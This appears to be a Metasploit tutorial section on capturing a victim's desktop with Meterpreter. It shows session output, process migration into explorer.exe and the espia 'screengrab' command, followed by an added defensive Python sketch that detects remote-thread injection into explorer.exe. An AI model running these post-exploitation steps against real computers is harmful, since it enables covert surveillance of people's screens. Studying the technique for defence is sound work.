Screen Capture

Screen Capturing in Metasploit

Another feature of Meterpreter is the ability to capture the victim’s desktop and save the image on your system. Let’s take a quick look at how this works. We’ll assume you already have a Meterpreter console and take a look at what is on the victim’s screen.

[*] Started bind handler
[*] Trying target Windows XP SP2 - English...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:34117 -> 192.168.1.104:4444)

meterpreter > ps

Process list
============

    PID   Name                 Path
    ---   ----                 ----
    180   notepad.exe          C:\WINDOWS\system32\notepad.exe
    248   snmp.exe             C:\WINDOWS\System32\snmp.exe
    260   Explorer.EXE         C:\WINDOWS\Explorer.EXE
    284   surgemail.exe        c:\surgemail\surgemail.exe
    332   VMwareService.exe    C:\Program Files\VMware\VMware Tools\VMwareService.exe
    612   VMwareTray.exe       C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    620   VMwareUser.exe       C:\Program Files\VMware\VMware Tools\VMwareUser.exe
    648   ctfmon.exe           C:\WINDOWS\system32\ctfmon.exe
    664   GrooveMonitor.exe    C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
    728   WZCSLDR2.exe         C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe
    736   jusched.exe          C:\Program Files\Java\jre6\bin\jusched.exe
    756   msmsgs.exe           C:\Program Files\Messenger\msmsgs.exe
    816   smss.exe             \SystemRoot\System32\smss.exe
    832   alg.exe              C:\WINDOWS\System32\alg.exe
    904   csrss.exe            \??\C:\WINDOWS\system32\csrss.exe
    928   winlogon.exe         \??\C:\WINDOWS\system32\winlogon.exe
    972   services.exe         C:\WINDOWS\system32\services.exe
    984   lsass.exe            C:\WINDOWS\system32\lsass.exe
    1152  vmacthlp.exe         C:\Program Files\VMware\VMware Tools\vmacthlp.exe
    1164  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1276  nwauth.exe           c:\surgemail\nwauth.exe
    1296  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1404  svchost.exe          C:\WINDOWS\System32\svchost.exe
    1500  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1652  svchost.exe          C:\WINDOWS\system32\svchost.exe
    1796  spoolsv.exe          C:\WINDOWS\system32\spoolsv.exe
    1912  3proxy.exe           C:\3proxy\bin\3proxy.exe
    2024  jqs.exe              C:\Program Files\Java\jre6\bin\jqs.exe
    2188  swatch.exe           c:\surgemail\swatch.exe
    2444  iexplore.exe         C:\Program Files\Internet Explorer\iexplore.exe
    3004  cmd.exe              C:\WINDOWS\system32\cmd.exe

meterpreter > migrate 260
[*] Migrating to 260...
[*] Migration completed successfully.
meterpreter > use espia
Loading extension espia...success.
meterpreter > screengrab
Screenshot saved to: /root/nYdRUppb.jpeg
meterpreter >

We can see how effective migrating to explorer.exe was. Be sure that the process your Meterpreter session is running in has access to active desktops, or this will not work.
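From the defender's side, the migration step is the observable one: moving a session into explorer.exe means code is injected into that process. As an added example (not part of the original course material), this sketch flags remote-thread creation into explorer.exe, assuming the host exports Sysmon-style Event ID 8 (CreateRemoteThread) records as JSON lines; the allowlist and the sample events are constructed.

```python
import json
import ntpath

# Constructed sample: JSON lines shaped like Sysmon Event ID 8 (CreateRemoteThread).
# Image paths and PIDs reuse the process list above; the events themselves are invented.
SAMPLE_EVENTS = r"""
{"EventID": 8, "SourceProcessId": 904, "SourceImage": "C:\\WINDOWS\\system32\\csrss.exe", "TargetProcessId": 260, "TargetImage": "C:\\WINDOWS\\Explorer.EXE", "StartModule": "C:\\WINDOWS\\system32\\kernel32.dll"}
{"EventID": 8, "SourceProcessId": 284, "SourceImage": "c:\\surgemail\\surgemail.exe", "TargetProcessId": 260, "TargetImage": "C:\\WINDOWS\\Explorer.EXE", "StartModule": ""}
{"EventID": 1, "ProcessId": 3004, "Image": "C:\\WINDOWS\\system32\\cmd.exe"}
{"EventID": 8, "SourceProcessId": 1164, "SourceImage": "C:\\WINDOWS\\system32\\svchost.exe", "TargetProcessId": 180, "TargetImage": "C:\\WINDOWS\\system32\\notepad.exe", "StartModule": ""}
not-json: truncated record
"""

# Processes that own the interactive desktop and are therefore worth watching.
WATCHED_TARGETS = {"explorer.exe"}
# Assumption: sources expected to create threads in the shell; tune per environment.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe"}


def parse_events(text):
    """Yield one dict per well-formed JSON line, skipping damaged records."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(event, dict):
            yield event


def find_suspicious_injections(text):
    """Return alerts for remote threads created in a watched desktop process."""
    alerts = []
    for ev in parse_events(text):
        if ev.get("EventID") != 8:
            continue
        source = str(ev.get("SourceImage", ""))
        target = str(ev.get("TargetImage", ""))
        if ntpath.basename(target).lower() not in WATCHED_TARGETS:
            continue
        if source.lower() in ALLOWED_SOURCES:
            continue
        # A thread whose start address is not backed by a loaded module is a stronger signal.
        severity = "high" if not ev.get("StartModule") else "medium"
        alerts.append({"source": source, "source_pid": ev.get("SourceProcessId"),
                       "target_pid": ev.get("TargetProcessId"), "severity": severity})
    return alerts
```
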
